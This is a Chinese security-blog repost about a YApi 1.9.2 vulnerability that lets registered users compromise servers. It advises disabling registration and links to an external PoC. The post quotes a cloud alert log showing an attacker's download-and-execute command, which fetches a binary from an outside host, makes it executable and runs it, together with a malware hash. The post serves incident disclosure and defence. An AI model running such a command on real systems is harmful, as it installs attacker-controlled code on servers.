​Yapi有安全漏洞,服务器被入侵了,附POC

admin
admin
admin
138635
文章
114
评论
2021年12月5日03:53:45评论250 views字数 846阅读2分49秒阅读模式

    最近看到有人的YAPI接口管理平台服务器被黑了。发现这个漏洞好像部分还存在,漏洞利用前提还是在注册用户的前提下。所以应急方式也是先关闭注册功能,排查已经注册的用户。看看有没有恶意用户。

版本号

版本: 1.9.2

什么问题

服务器被入侵了, 阿里云报的:

  1. -[25877]  PM2 v4.4.0: God Daemon (/root/.pm2)
  2.     -[26378]  node server/app.js
  3.         -[31498]  /bin/sh -c id;wget http://2w.kacdn.cn/20000;chmod 777 20000;./20000
  4. -[25877]  PM2 v4.4.0: God Daemon (/root/.pm2)
  5.     -[26378]  node server/app.js
  6. -[25877]  PM2 v4.4.0: God Daemon (/root/.pm2)
  7.     -[26378]  node server/app.js
  8.         -[31498]  /bin/sh -c id;wget http://2w.kacdn.cn/20000;chmod 777 20000;./20000
  9.             -[31502]  ./20000
  10.                 -[31503]  ./20000
  11. 该告警由如下引擎检测发现:
  12. 文件路径: /usr/bin/ps
  13. 恶意文件md5: c303c2fff08565b7977afccb762e2072
  14. 扫描来源方式: 进程启动扫描
  15. 进程id: 31969
  16. 进程命令行: ps aux

如何复现此问题

~

什么浏览器

~

什么系统(Linux, Windows, macOS)

Centos

​Yapi有安全漏洞,服务器被入侵了,附POC

​Yapi有安全漏洞,服务器被入侵了,附POC

​Yapi有安全漏洞,服务器被入侵了,附POC

截图来自: https://github.com/YMFE/yapi/issues/2229

验证漏洞

​Yapi有安全漏洞,服务器被入侵了,附POC


开源验证的POC,用的pocsuite3框架,方便批量验证。及时验证资产。减少风险暴露。

POC地址:

https://github.com/awake1t/SomePocsuitePoc/blob/main/yapi-1.9.2-poc.py


本文始发于微信公众号(渗透测试教程):​Yapi有安全漏洞,服务器被入侵了,附POC

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年12月5日03:53:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   ​Yapi有安全漏洞,服务器被入侵了,附POChttps://cn-sec.com/archives/412832.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息